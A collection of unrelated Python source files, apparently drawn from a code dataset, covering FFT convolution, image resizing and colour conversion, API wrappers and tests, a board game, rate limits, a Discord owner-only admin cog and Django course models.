wtfftmult = wtfft*kernfft/kernel.sum()
wtsm = ifftn(wtfftmult)
# need to re-zero weights outside of the image (if it is padded, we
# still don't weight those regions)
bigimwt[arrayslices] = wtsm.real[arrayslices]
# curiously, at the floating-point limit, can get slightly negative numbers
# they break the min_wt=0 "flag" and must therefore be removed
bigimwt[bigimwt<0] = 0
else:
bigimwt = 1
if np.isnan(fftmult).any():
# this check should be unnecessary; call it an insanity check
raise ValueError("Encountered NaNs in convolve. This is disallowed.")
# restore nans in original image (they were modified inplace earlier)
# We don't have to worry about masked arrays - if input was masked, it was
# copied
array[nanmaskarray] = np.nan
kernel[nanmaskkernel] = np.nan
if return_fft:
if fftshift: # default on
if crop:
return np.fft.fftshift(fftmult)[arrayslices]
else:
return np.fft.fftshift(fftmult)
else:
return fftmult
if interpolate_nan or ignore_edge_zeros:
rifft = (ifftn(fftmult)) / bigimwt
if not np.isscalar(bigimwt):
rifft[bigimwt < min_wt] = np.nan
if min_wt == 0.0:
rifft[bigimwt == 0.0] = 0.0
else:
rifft = (ifftn(fftmult))
if crop:
result = rifft[arrayslices].real
return result
else:
return rifft.real
def correlate2d(im1,im2, boundary='wrap', **kwargs):
"""
Cross-correlation of two images of arbitrary size. Returns an image
cropped to the largest of each dimension of the input images
Options
-------
return_fft - if true, return fft(im1)*fft(im2[::-1,::-1]), which is the power
spectral density
fftshift - if true, return the shifted psd so that the DC component is in
the center of the image
pad - Default on. Zero-pad image to the nearest 2^n
crop - Default on. Return an image of the size of the largest input image.
If the images are asymmetric in opposite directions, will return the largest
image in both directions.
boundary: str, optional
A flag indicating how to handle boundaries:
* 'fill' : set values outside the array boundary to fill_value
(default)
* 'wrap' : periodic boundary
WARNING: Normalization may be arbitrary if you use the PSD
"""
return convolve(np.conjugate(im1), im2[::-1, ::-1], normalize_kernel=False,
boundary=boundary, ignore_edge_zeros=False, **kwargs)
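# Illustrative note (not part of the original file): for registration purposes
# the peak of the cross-correlation surface gives the translation between the
# two images, measured relative to the image centre, e.g.
#
#     cc = correlate2d(im1, im2)
#     dy, dx = np.unravel_index(np.argmax(cc), cc.shape)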
|
StarcoderdataPython
|
1682101
|
from ydk.services import CRUDService
from ydk.providers import NetconfServiceProvider
from ydk.models.cisco_ios_xe import Cisco_IOS_XE_interfaces_oper as xe_interface
import device
ios_xe = device.xe_sandbox()
# EXERCISE : Construct an instance of the NetconfServiceProvider class.
# Use the YDK documentation on NETCONF Service Provider to understand which parameters you need to pass.
# Parameters are stored in the `device` class (which is imported line 4).
provider = NetconfServiceProvider(EXERCISE)
# create CRUD service
crud = CRUDService()
# EXERCISE : Set the right filter, using Advanced Netconf Explorer, using the right attribute(s) of the imported
# `Cisco_IOS_XE_interfaces_oper` module
interfaces_filter = EXERCISE
# EXERCISE : Use the `CRUDService API` to get (READ) the operational state of the interfaces of the device.
# Store the object in a new variable `interfaces`
interfaces = EXERCISE
# EXERCISE : now that you have an object, containing the interfaces operational state, get each interface name, and each interface IP.
|
StarcoderdataPython
|
8006871
|
from six import wraps
class Response(object):
"""
Transloadit http Response Object
:Attributes:
- data (dict):
Dictionary representation of the returned JSON data.
- status_code (int):
HTTP response status code
- headers (dict):
Dictionary representation of the headers returned from the server.
:Constructor Args:
- response (<requests.Response>): The bare response object from the requests library.
"""
def __init__(self, response):
self._response = response
self.data = self._response.json()
@property
def status_code(self):
"""
Return the http status code of the request.
"""
return self._response.status_code
@property
def headers(self):
"""
Return the response headers.
"""
return self._response.headers
def as_response(func):
"""
Decorator function that converts the output of a function into an instance
of the <transloadit.response.Response> class.
"""
@wraps(func)
def _wrapper(*args, **kwargs):
return Response(func(*args, **kwargs))
return _wrapper
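# Illustrative usage sketch (function name and URL are placeholders, not part
# of the original module): the decorator can wrap any callable that returns a
# bare requests.Response, converting its return value into this Response class.
#
#     import requests
#
#     @as_response
#     def fetch(url):
#         return requests.get(url)
#
#     resp = fetch('https://api2.transloadit.com/assemblies')
#     print(resp.status_code, resp.data)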
|
StarcoderdataPython
|
137298
|
<reponame>joegomes/BasicSR<gh_stars>1-10
import math
import numpy as np
import torch
def cubic(x):
"""cubic function used for calculate_weights_indices."""
absx = torch.abs(x)
absx2 = absx**2
absx3 = absx**3
return (1.5 * absx3 - 2.5 * absx2 + 1) * (
(absx <= 1).type_as(absx)) + (-0.5 * absx3 + 2.5 * absx2 - 4 * absx + 2) * (((absx > 1) *
(absx <= 2)).type_as(absx))
def calculate_weights_indices(in_length, out_length, scale, kernel, kernel_width, antialiasing):
"""Calculate weights and indices, used for imresize function.
Args:
in_length (int): Input length.
out_length (int): Output length.
scale (float): Scale factor.
kernel_width (int): Kernel width.
        antialiasing (bool): Whether to apply anti-aliasing when downsampling.
"""
if (scale < 1) and antialiasing:
# Use a modified kernel (larger kernel width) to simultaneously
# interpolate and antialias
kernel_width = kernel_width / scale
# Output-space coordinates
x = torch.linspace(1, out_length, out_length)
# Input-space coordinates. Calculate the inverse mapping such that 0.5
# in output space maps to 0.5 in input space, and 0.5 + scale in output
# space maps to 1.5 in input space.
u = x / scale + 0.5 * (1 - 1 / scale)
# What is the left-most pixel that can be involved in the computation?
left = torch.floor(u - kernel_width / 2)
# What is the maximum number of pixels that can be involved in the
# computation? Note: it's OK to use an extra pixel here; if the
# corresponding weights are all zero, it will be eliminated at the end
# of this function.
p = math.ceil(kernel_width) + 2
# The indices of the input pixels involved in computing the k-th output
# pixel are in row k of the indices matrix.
indices = left.view(out_length, 1).expand(out_length, p) + torch.linspace(0, p - 1, p).view(1, p).expand(
out_length, p)
# The weights used to compute the k-th output pixel are in row k of the
# weights matrix.
distance_to_center = u.view(out_length, 1).expand(out_length, p) - indices
# apply cubic kernel
if (scale < 1) and antialiasing:
weights = scale * cubic(distance_to_center * scale)
else:
weights = cubic(distance_to_center)
# Normalize the weights matrix so that each row sums to 1.
weights_sum = torch.sum(weights, 1).view(out_length, 1)
weights = weights / weights_sum.expand(out_length, p)
# If a column in weights is all zero, get rid of it. only consider the
# first and last column.
weights_zero_tmp = torch.sum((weights == 0), 0)
if not math.isclose(weights_zero_tmp[0], 0, rel_tol=1e-6):
indices = indices.narrow(1, 1, p - 2)
weights = weights.narrow(1, 1, p - 2)
if not math.isclose(weights_zero_tmp[-1], 0, rel_tol=1e-6):
indices = indices.narrow(1, 0, p - 2)
weights = weights.narrow(1, 0, p - 2)
weights = weights.contiguous()
indices = indices.contiguous()
sym_len_s = -indices.min() + 1
sym_len_e = indices.max() - in_length
indices = indices + sym_len_s - 1
return weights, indices, int(sym_len_s), int(sym_len_e)
@torch.no_grad()
def imresize(img, scale, antialiasing=True):
"""imresize function same as MATLAB.
It now only supports bicubic.
The same scale applies for both height and width.
Args:
img (Tensor | Numpy array):
Tensor: Input image with shape (c, h, w), [0, 1] range.
Numpy: Input image with shape (h, w, c), [0, 1] range.
scale (float): Scale factor. The same scale applies for both height
and width.
        antialiasing (bool): Whether to apply anti-aliasing when downsampling.
Default: True.
Returns:
Tensor: Output image with shape (c, h, w), [0, 1] range, w/o round.
"""
squeeze_flag = False
if type(img).__module__ == np.__name__: # numpy type
numpy_type = True
if img.ndim == 2:
img = img[:, :, None]
squeeze_flag = True
img = torch.from_numpy(img.transpose(2, 0, 1)).float()
else:
numpy_type = False
if img.ndim == 2:
img = img.unsqueeze(0)
squeeze_flag = True
in_c, in_h, in_w = img.size()
out_h, out_w = math.ceil(in_h * scale), math.ceil(in_w * scale)
kernel_width = 4
kernel = 'cubic'
# get weights and indices
weights_h, indices_h, sym_len_hs, sym_len_he = calculate_weights_indices(in_h, out_h, scale, kernel, kernel_width,
antialiasing)
weights_w, indices_w, sym_len_ws, sym_len_we = calculate_weights_indices(in_w, out_w, scale, kernel, kernel_width,
antialiasing)
# process H dimension
# symmetric copying
img_aug = torch.FloatTensor(in_c, in_h + sym_len_hs + sym_len_he, in_w)
img_aug.narrow(1, sym_len_hs, in_h).copy_(img)
sym_patch = img[:, :sym_len_hs, :]
inv_idx = torch.arange(sym_patch.size(1) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(1, inv_idx)
img_aug.narrow(1, 0, sym_len_hs).copy_(sym_patch_inv)
sym_patch = img[:, -sym_len_he:, :]
inv_idx = torch.arange(sym_patch.size(1) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(1, inv_idx)
img_aug.narrow(1, sym_len_hs + in_h, sym_len_he).copy_(sym_patch_inv)
out_1 = torch.FloatTensor(in_c, out_h, in_w)
kernel_width = weights_h.size(1)
for i in range(out_h):
idx = int(indices_h[i][0])
for j in range(in_c):
out_1[j, i, :] = img_aug[j, idx:idx + kernel_width, :].transpose(0, 1).mv(weights_h[i])
# process W dimension
# symmetric copying
out_1_aug = torch.FloatTensor(in_c, out_h, in_w + sym_len_ws + sym_len_we)
out_1_aug.narrow(2, sym_len_ws, in_w).copy_(out_1)
sym_patch = out_1[:, :, :sym_len_ws]
inv_idx = torch.arange(sym_patch.size(2) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(2, inv_idx)
out_1_aug.narrow(2, 0, sym_len_ws).copy_(sym_patch_inv)
sym_patch = out_1[:, :, -sym_len_we:]
inv_idx = torch.arange(sym_patch.size(2) - 1, -1, -1).long()
sym_patch_inv = sym_patch.index_select(2, inv_idx)
out_1_aug.narrow(2, sym_len_ws + in_w, sym_len_we).copy_(sym_patch_inv)
out_2 = torch.FloatTensor(in_c, out_h, out_w)
kernel_width = weights_w.size(1)
for i in range(out_w):
idx = int(indices_w[i][0])
for j in range(in_c):
out_2[j, :, i] = out_1_aug[j, :, idx:idx + kernel_width].mv(weights_w[i])
if squeeze_flag:
out_2 = out_2.squeeze(0)
if numpy_type:
out_2 = out_2.numpy()
if not squeeze_flag:
out_2 = out_2.transpose(1, 2, 0)
return out_2
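# Illustrative usage sketch (not part of the original file): numpy arrays in
# (h, w, c) layout with [0, 1] range and tensors in (c, h, w) are both accepted.
#
#     img = np.random.rand(64, 64, 3).astype(np.float32)
#     small = imresize(img, 0.5)  # -> (32, 32, 3), bicubic with antialiasing
#     big = imresize(small, 2.0)  # -> (64, 64, 3)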
def rgb2ycbcr(img, y_only=False):
"""Convert a RGB image to YCbCr image.
This function produces the same results as Matlab's `rgb2ycbcr` function.
It implements the ITU-R BT.601 conversion for standard-definition
television. See more details in
https://en.wikipedia.org/wiki/YCbCr#ITU-R_BT.601_conversion.
It differs from a similar function in cv2.cvtColor: `RGB <-> YCrCb`.
In OpenCV, it implements a JPEG conversion. See more details in
https://en.wikipedia.org/wiki/YCbCr#JPEG_conversion.
Args:
img (ndarray): The input image. It accepts:
1. np.uint8 type with range [0, 255];
2. np.float32 type with range [0, 1].
y_only (bool): Whether to only return Y channel. Default: False.
Returns:
ndarray: The converted YCbCr image. The output image has the same type
and range as input image.
"""
img_type = img.dtype
img = _convert_input_type_range(img)
if y_only:
out_img = np.dot(img, [65.481, 128.553, 24.966]) + 16.0
else:
out_img = np.matmul(
img, [[65.481, -37.797, 112.0], [128.553, -74.203, -93.786], [24.966, 112.0, -18.214]]) + [16, 128, 128]
out_img = _convert_output_type_range(out_img, img_type)
return out_img
def bgr2ycbcr(img, y_only=False):
"""Convert a BGR image to YCbCr image.
The bgr version of rgb2ycbcr.
It implements the ITU-R BT.601 conversion for standard-definition
television. See more details in
https://en.wikipedia.org/wiki/YCbCr#ITU-R_BT.601_conversion.
It differs from a similar function in cv2.cvtColor: `BGR <-> YCrCb`.
In OpenCV, it implements a JPEG conversion. See more details in
https://en.wikipedia.org/wiki/YCbCr#JPEG_conversion.
Args:
img (ndarray): The input image. It accepts:
1. np.uint8 type with range [0, 255];
2. np.float32 type with range [0, 1].
y_only (bool): Whether to only return Y channel. Default: False.
Returns:
ndarray: The converted YCbCr image. The output image has the same type
and range as input image.
"""
img_type = img.dtype
img = _convert_input_type_range(img)
if y_only:
out_img = np.dot(img, [24.966, 128.553, 65.481]) + 16.0
else:
out_img = np.matmul(
img, [[24.966, 112.0, -18.214], [128.553, -74.203, -93.786], [65.481, -37.797, 112.0]]) + [16, 128, 128]
out_img = _convert_output_type_range(out_img, img_type)
return out_img
def ycbcr2rgb(img):
"""Convert a YCbCr image to RGB image.
This function produces the same results as Matlab's ycbcr2rgb function.
It implements the ITU-R BT.601 conversion for standard-definition
television. See more details in
https://en.wikipedia.org/wiki/YCbCr#ITU-R_BT.601_conversion.
It differs from a similar function in cv2.cvtColor: `YCrCb <-> RGB`.
In OpenCV, it implements a JPEG conversion. See more details in
https://en.wikipedia.org/wiki/YCbCr#JPEG_conversion.
Args:
img (ndarray): The input image. It accepts:
1. np.uint8 type with range [0, 255];
2. np.float32 type with range [0, 1].
Returns:
ndarray: The converted RGB image. The output image has the same type
and range as input image.
"""
img_type = img.dtype
img = _convert_input_type_range(img) * 255
out_img = np.matmul(img, [[0.00456621, 0.00456621, 0.00456621], [0, -0.00153632, 0.00791071],
[0.00625893, -0.00318811, 0]]) * 255.0 + [-222.921, 135.576, -276.836] # noqa: E126
out_img = _convert_output_type_range(out_img, img_type)
return out_img
def ycbcr2bgr(img):
"""Convert a YCbCr image to BGR image.
The bgr version of ycbcr2rgb.
It implements the ITU-R BT.601 conversion for standard-definition
television. See more details in
https://en.wikipedia.org/wiki/YCbCr#ITU-R_BT.601_conversion.
It differs from a similar function in cv2.cvtColor: `YCrCb <-> BGR`.
In OpenCV, it implements a JPEG conversion. See more details in
https://en.wikipedia.org/wiki/YCbCr#JPEG_conversion.
Args:
img (ndarray): The input image. It accepts:
1. np.uint8 type with range [0, 255];
2. np.float32 type with range [0, 1].
Returns:
ndarray: The converted BGR image. The output image has the same type
and range as input image.
"""
img_type = img.dtype
img = _convert_input_type_range(img) * 255
out_img = np.matmul(img, [[0.00456621, 0.00456621, 0.00456621], [0.00791071, -0.00153632, 0],
[0, -0.00318811, 0.00625893]]) * 255.0 + [-276.836, 135.576, -222.921] # noqa: E126
out_img = _convert_output_type_range(out_img, img_type)
return out_img
def _convert_input_type_range(img):
"""Convert the type and range of the input image.
It converts the input image to np.float32 type and range of [0, 1].
It is mainly used for pre-processing the input image in colorspace
    conversion functions such as rgb2ycbcr and ycbcr2rgb.
Args:
img (ndarray): The input image. It accepts:
1. np.uint8 type with range [0, 255];
2. np.float32 type with range [0, 1].
Returns:
(ndarray): The converted image with type of np.float32 and range of
[0, 1].
"""
img_type = img.dtype
img = img.astype(np.float32)
if img_type == np.float32:
pass
elif img_type == np.uint8:
img /= 255.
else:
raise TypeError(f'The img type should be np.float32 or np.uint8, but got {img_type}')
return img
def _convert_output_type_range(img, dst_type):
"""Convert the type and range of the image according to dst_type.
It converts the image to desired type and range. If `dst_type` is np.uint8,
images will be converted to np.uint8 type with range [0, 255]. If
`dst_type` is np.float32, it converts the image to np.float32 type with
range [0, 1].
    It is mainly used for post-processing images in colorspace conversion
functions such as rgb2ycbcr and ycbcr2rgb.
Args:
img (ndarray): The image to be converted with np.float32 type and
range [0, 255].
dst_type (np.uint8 | np.float32): If dst_type is np.uint8, it
converts the image to np.uint8 type with range [0, 255]. If
dst_type is np.float32, it converts the image to np.float32 type
with range [0, 1].
Returns:
(ndarray): The converted image with desired type and range.
"""
if dst_type not in (np.uint8, np.float32):
raise TypeError(f'The dst_type should be np.float32 or np.uint8, but got {dst_type}')
if dst_type == np.uint8:
img = img.round()
else:
img /= 255.
return img.astype(dst_type)
|
StarcoderdataPython
|
176985
|
<reponame>raphael-abrantes/exercises-python
from random import randint
from time import sleep
from operator import itemgetter  # used to grab part of each dict item: 0 = key / 1 = value
jogo = dict()
rank = list()
cont = 0
while True:
num = randint(1,6)
if num not in jogo.values():
cont += 1
jogo[f'jogador{cont}'] = num
if cont == 4:
break
for k,v in jogo.items():
print(f'{k} tirou {v} no dado.')
sleep(0.5)
print('~*+'*10)
print(' -====RANKING====-')
rank = sorted(jogo.items(), key=itemgetter(1), reverse=True)
for i, r in enumerate(rank):
print(f'Em {i+1}º lugar, {r[0]} com {r[1]}')
sleep(0.5)
|
StarcoderdataPython
|
9722038
|
<gh_stars>0
from unittest import IsolatedAsyncioTestCase
from src.pyscoresaber import ScoreSaberAPI, NotFoundException
class TestScoreSaber(IsolatedAsyncioTestCase):
valid_player_ids = [
"76561198029447509",
"76561198333869741",
"76561198187936410",
"76561198835772160",
"76561197995162898",
"76561198153101808",
"2538637699496776"
]
invalid_player_id = "656119802447509"
async def asyncSetUp(self):
self.scoresaber = ScoreSaberAPI()
await self.scoresaber.start()
async def asyncTearDown(self):
await self.scoresaber.close()
async def test_players(self):
players = await self.scoresaber.players()
assert len(players) > 0
async def test_player_basic_valid(self):
player = await self.scoresaber.player_basic(self.valid_player_ids[0])
assert player.player_id == self.valid_player_ids[0]
async def test_player_basic_invalid(self):
with self.assertRaises(NotFoundException):
await self.scoresaber.player_basic(self.invalid_player_id)
async def test_player_full_valid(self):
player = await self.scoresaber.player_full(self.valid_player_ids[0])
assert player.player_id == self.valid_player_ids[0]
async def test_player_full_invalid(self):
with self.assertRaises(NotFoundException):
await self.scoresaber.player_full(self.invalid_player_id)
async def test_player_scores_recent_valid(self):
scores = await self.scoresaber.player_scores_recent(self.valid_player_ids[0])
assert len(scores) > 0
async def test_player_scores_recent_invalid(self):
with self.assertRaises(NotFoundException):
await self.scoresaber.player_scores_recent(self.invalid_player_id)
async def test_player_scores_top_valid(self):
scores_1 = await self.scoresaber.player_scores_top(self.valid_player_ids[0], 1)
assert len(scores_1) > 0
scores_2 = await self.scoresaber.player_scores_top(self.valid_player_ids[0], 2)
assert len(scores_2) > 0
async def test_player_scores_top_invalid(self):
with self.assertRaises(NotFoundException):
await self.scoresaber.player_scores_top(self.invalid_player_id, 1)
with self.assertRaises(NotFoundException):
await self.scoresaber.player_scores_top(self.invalid_player_id, 2)
async def test_player_scores_top_invalid_page(self):
scores_1 = await self.scoresaber.player_scores_recent(self.valid_player_ids[0], 248)
assert len(scores_1) > 7
with self.assertRaises(NotFoundException):
await self.scoresaber.player_scores_recent(self.valid_player_ids[0], 12412312)
async def test_players_basic(self):
async for player in self.scoresaber.players_basic(self.valid_player_ids):
assert player.player_id in self.valid_player_ids
async def test_players_full(self):
async for player in self.scoresaber.players_full(self.valid_player_ids):
assert player.player_id in self.valid_player_ids
async def test_player_scores_recent_all(self):
pages = 0
async for scores in self.scoresaber.player_scores_recent_all(self.valid_player_ids[0]):
if pages > 2:
break
assert len(scores) > 0
pages += 1
async def test_player_scores_top_all(self):
pages = 0
async for scores in self.scoresaber.player_scores_top_all(self.valid_player_ids[0]):
if pages > 2:
break
assert len(scores) > 0
pages += 1
|
StarcoderdataPython
|
5118129
|
<filename>gym_tak/tak/game/tak_game.py
from gym_tak.tak.board import Presets, Board
from gym_tak.tak.piece import Colors, Types
from gym_tak.tak.player import Player
class TakGame:
def __init__(self, preset: Presets, player1: str, player2: str) -> None:
super().__init__()
self.preset = preset
self.board = Board(preset)
self.player1 = Player(player1, self, Colors.BLACK)
self.player2 = Player(player2, self, Colors.WHITE)
self.winner = None
self.next_player = self.player1
self.active = True
self.turn = 1
def can_move(self, player: Player, column_from: int, row_from: int, column_to: int, row_to: int, pieces: int) -> bool:
return self.active and player is self.next_player and self.board.can_move(player.hand.color, column_from, row_from,
column_to, row_to, pieces)
def move(self, player: Player, column_from: int, row_from: int, column_to: int, row_to: int, pieces: int) -> None:
print(player.name + " moving from column " + str(column_from) + " row " + str(row_from) + " to column " + str(column_to) + " row " + str(row_to))
assert self.can_move(player, column_from, row_from, column_to, row_to, pieces)
self.board.move(column_from, row_from, column_to, row_to, pieces)
self.next_player = self.get_other_player(self.next_player)
self.turn += 1
def can_place(self, player: Player, column: int, row: int, type_: Types) -> bool:
return self.active and player is self.next_player and player.hand.has(type_) and self.board.rows[row, column, 0] == 0
def place(self, player: Player, column: int, row: int, type_: Types) -> None:
print(player.name + " placing in column " + str(column) + " row " + str(row))
assert self.can_place(player, column, row, type_)
piece = player.hand.take_piece(type_)
self.board.place(piece, column, row)
        self.next_player = self.get_other_player(self.next_player)
self.turn += 1
def get_player(self, color: Colors) -> Player:
if color is Colors.BLACK:
return self.player1
elif color is Colors.WHITE:
return self.player2
else:
raise ValueError('Unrecognized color %s' % color)
def get_other_player(self, player: Player) -> Player:
if player is self.player1:
return self.player2
elif player is self.player2:
return self.player1
else:
raise ValueError('Player %s is not in this game' % player.name)
def surrender(self, player: Player) -> None:
self.active = False
self.winner = self.get_other_player(player)
def reset(self) -> None:
self.board.reset()
self.player1.reset()
self.player2.reset()
self.winner = None
self.next_player = self.player1
self.active = True
self.turn = 1
|
StarcoderdataPython
|
5055374
|
<filename>ccxt_rate_limiter/okex.py
# not accurate
def okex_wrap_defs():
# https://github.com/ccxt/ccxt/blob/master/python/ccxt/okex.py#L104
return [
{
'regex': 'Get|Post|Delete',
'tags': ['all'],
'count': 1,
},
{
'regex': 'Get.*(Position|Balance)',
'tags': ['get_position'],
'count': 1,
},
{
'regex': 'Get.*Order',
'tags': ['get_order'],
'count': 1,
},
{
'regex': 'Get.*Fill',
'tags': ['get_fill'],
'count': 1,
},
{
'regex': 'Get.*Config',
'tags': ['get_config'],
'count': 1,
},
]
# The official limits are very fine-grained, so only the important ones with periods shorter than the default are listed here
# https://www.okex.com/docs/en/#summary-limit
def okex_limits():
return [
{
'tag': 'all',
'period_sec': 1,
'count': 6
},
{
'tag': 'get_position',
'period_sec': 2,
'count': 10
},
{
'tag': 'get_order',
'period_sec': 2,
'count': 10
},
{
'tag': 'get_fill',
'period_sec': 2,
'count': 10
},
{
'tag': 'get_config',
'period_sec': 2,
'count': 5
},
]
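# Minimal usage sketch (an illustrative assumption, not part of ccxt_rate_limiter's
# documented API): collect the rate-limit tags that apply to a ccxt method name by
# matching it against the regexes defined above.
import re

def tags_for_method(method_name, wrap_defs=None):
    """Return every tag whose regex matches the given ccxt method name."""
    wrap_defs = okex_wrap_defs() if wrap_defs is None else wrap_defs
    tags = []
    for d in wrap_defs:
        if re.search(d['regex'], method_name):
            tags.extend(d['tags'])
    return tags

# Example: tags_for_method('privateGetAccountPositions') -> ['all', 'get_position']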
|
StarcoderdataPython
|
1722037
|
<filename>apps/courses/models.py<gh_stars>10-100
# -*-coding:utf-8-*-
# -------------------python--------------
from __future__ import unicode_literals
from datetime import datetime
import sys
# -------------------django---------------
from django.db import models
# -------------------model----------------
from organization.models import CourseOrg, Teacher
from DjangoUeditor.models import UEditorField
# Create your models here.
reload(sys)
sys.setdefaultencoding('utf8')
class Course(models.Model):
course_org = models.ForeignKey(CourseOrg, verbose_name=u"课程机构", null=True, blank=True)
name = models.CharField(max_length=50, verbose_name=u"课程名")
desc = models.CharField(max_length=300, verbose_name=u"课程描述")
    # Note on imagePath: do not pass %Y/%m here and do not use a leading slash; it is a relative path, resolved against MEDIA_ROOT configured in settings
detail = UEditorField(verbose_name=u"课程详情", width=600, height=300, imagePath="courses/ueditor/", filePath="courses/ueditor/", default='')
    is_banner = models.BooleanField(default=False, verbose_name=u"是否轮播")
teacher = models.ForeignKey(Teacher, verbose_name=u"讲师", null=True, blank=True)
degree = models.CharField(verbose_name=u"难度", choices=(("cj", u"初级"), ("zj", u"中级"), ("gj", u"高级")), max_length=2)
learn_times = models.IntegerField(default=0, verbose_name=u"学习时长(分钟)")
students = models.IntegerField(default=0, verbose_name=u"学习人数")
fav_nums = models.IntegerField(default=0, verbose_name=u"收藏人数")
image = models.ImageField(upload_to="courses/%Y/%m", verbose_name=u"封面图", max_length=100)
click_nums = models.IntegerField(default=0, verbose_name=u"点击数")
category = models.CharField(default=u"python", max_length=50, verbose_name=u"课程类别")
tag = models.CharField(default="", verbose_name=u"课程标签", max_length=20)
you_know = models.CharField(default="", max_length=300, verbose_name=u"课程须知")
teacher_tell = models.CharField(default="", max_length=300, verbose_name=u"老师说")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"课程"
verbose_name_plural = verbose_name
    # ----- get the number of course chapters -----
def get_zj_nums(self):
return self.lesson_set.all().count()
def get_learn_users(self):
return self.usercourse_set.all()[:5]
    # Get all chapters of this course
def get_course_lesson(self):
return self.lesson_set.all().order_by('-add_time')
def __unicode__(self):
return self.name
class Lesson(models.Model):
course = models.ForeignKey(Course, verbose_name=u"课程")
name = models.CharField(max_length=100, verbose_name=u"章节名")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"章节"
verbose_name_plural = verbose_name
    # Get this chapter's videos
def get_lesson_video(self):
return self.video_set.all()
def __unicode__(self):
return self.name
class Video(models.Model):
lesson = models.ForeignKey(Lesson, verbose_name=u"章节")
name = models.CharField(max_length=100, verbose_name=u"视频名")
url = models.CharField(max_length=200, default="", verbose_name=u"访问地址")
learn_times = models.IntegerField(default=0, verbose_name=u"学习时长(分钟)")
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"视频"
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
class CourseResource(models.Model):
course = models.ForeignKey(Course, verbose_name=u"课程")
name = models.CharField(max_length=100, verbose_name=u"名称")
download = models.FileField(upload_to="course/resource/%Y/%m",verbose_name=u"资源文件", max_length=100)
add_time = models.DateTimeField(default=datetime.now, verbose_name=u"添加时间")
class Meta:
verbose_name = u"课程资源"
verbose_name_plural = verbose_name
def __unicode__(self):
return self.name
|
StarcoderdataPython
|
8002340
|
import click
from testplan.cli.utils.command_list import CommandList
from testplan.importers.cppunit import CPPUnitResultImporter
from testplan.importers.gtest import GTestResultImporter
reader_commands = CommandList()
def with_input(fn):
return click.argument(
"source", type=click.Path(exists=True), required=True
)(fn)
def with_plan_options(fn):
options = [
click.option(
"-n",
"--name",
"name",
type=str,
help="The name of the generated testplan and test",
),
click.option(
"-d",
"--description",
"description",
type=str,
help="Description of the result",
),
]
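    # Decorators compose bottom-up, so applying the list in reverse mimics writing
    # them as stacked decorators and keeps the options in their declared order.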
for option_decorator in options[::-1]:
fn = option_decorator(fn)
return fn
@reader_commands.command(name="fromcppunit")
@with_input
@with_plan_options
def from_cppunit(source, name, description):
def parse(result):
importer = CPPUnitResultImporter(source, name, description)
return importer.import_result().as_test_report()
return parse
@reader_commands.command(name="fromgtest")
@with_input
@with_plan_options
def from_gtest(source, name, description):
def parse(result):
importer = GTestResultImporter(source, name, description)
return importer.import_result().as_test_report()
return parse
|
StarcoderdataPython
|
11332366
|
<filename>cogs/admin.py
import discord
from discord.ext import commands
from logging import info
import jishaku
import os
import sys
from core.database import SQL # pylint: disable=import-error
from core.files import load_locales
class Admin(commands.Cog):
def __init__(self, bot):
"""Комманды для владельца бота."""
self.bot = bot
self.sql = SQL(bot.db).sql
async def cog_check(self, ctx):
if await self.bot.is_owner(ctx.author):
return True
raise commands.NotOwner()
@commands.command(hidden=True, aliases=['reboot'])
async def restart(self, ctx):
await ctx.send('> Restart')
os.execl(sys.executable, sys.executable, *sys.argv) # nosec
@commands.group(name="sql",
invoke_without_command=True,
hidden=True)
async def sql_cmd(self, ctx, *, code: jishaku.codeblocks.codeblock_converter):
"""Исполнить запрос к PostgreSQL."""
requests = code.content.split(";")
out = []
line = 0
returned = "RESULT\n\n"
for request in requests:
if not request: # '' case
continue
try:
answer = await self.sql(request)
except Exception as e:
answer = f"{type(e).__name__}: {e}"
out.append(answer)
for result in out:
returned += f"Line {line}: ```{result}```\n\n"
line += 1
if len(returned) > 1997:
returned = returned[:1997] + "..."
await ctx.send(returned)
@sql_cmd.command(hidden=True)
async def backup(self, ctx):
"""Создать резервную копию базы данных."""
os.system(f'pg_dump {self.bot.config["sqlPath"]} > backup.psql') # nosec
await ctx.author.send(
"Backup loaded",
file=discord.File("backup.psql"))
@commands.command(hidden=True)
async def update(self, ctx):
"""Git pull and restart of the bot"""
if os.system('git pull') != 0:
return await ctx.send('Error')
await ctx.invoke(self.restart)
@commands.command(hidden=True, aliases=["rl", "reload_locales", "rlocale", "reloadl"])
async def reload_locale(self, ctx):
info('Locale reloaded by owner')
self.bot.locales = load_locales()
await ctx.send('Reloaded.')
def setup(bot):
cog = Admin(bot)
bot.add_cog(cog)
|
StarcoderdataPython
|
6583992
|
<reponame>walkr/ciex<gh_stars>0
# Utility functions
import sys
from ciex.contrib.workers.elixir import *
from ciex.contrib.workers.golang import *
def load_contrib_worker(worker_name):
""" Load a local worker """
return globals()[worker_name]
def load_other_worker(worker_dirpath, worker_modname, worker_name):
""" Add path to sys.path and load worker """
if worker_dirpath not in sys.path:
sys.path.append(worker_dirpath)
mod = __import__(worker_modname)
return getattr(mod, worker_name)
def load_worker(worker_dirpath, worker_modname, worker_name):
""" Load worker class """
# Local
if worker_dirpath == worker_modname == '.':
return load_contrib_worker(worker_name)
# Other
return load_other_worker(worker_dirpath, worker_modname, worker_name)
|
StarcoderdataPython
|
3224889
|
<gh_stars>0
def add_numbers(x, y):
"""Add numbers together"""
if type(x) != int or type(y) != int:
return None
return x + y
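# Illustrative behaviour (not in the original file): add_numbers(2, 3) returns 5,
# while add_numbers(2, "3") and add_numbers(2.0, 3) return None because both
# arguments must be plain ints.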
|
StarcoderdataPython
|
3469407
|
<gh_stars>0
# Copyright 2019 The Feast Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional, Tuple, Union
import pandas as pd
import pyarrow
from feast.data_source import FileSource
from feast.entity import Entity
from feast.feature_view import FeatureView
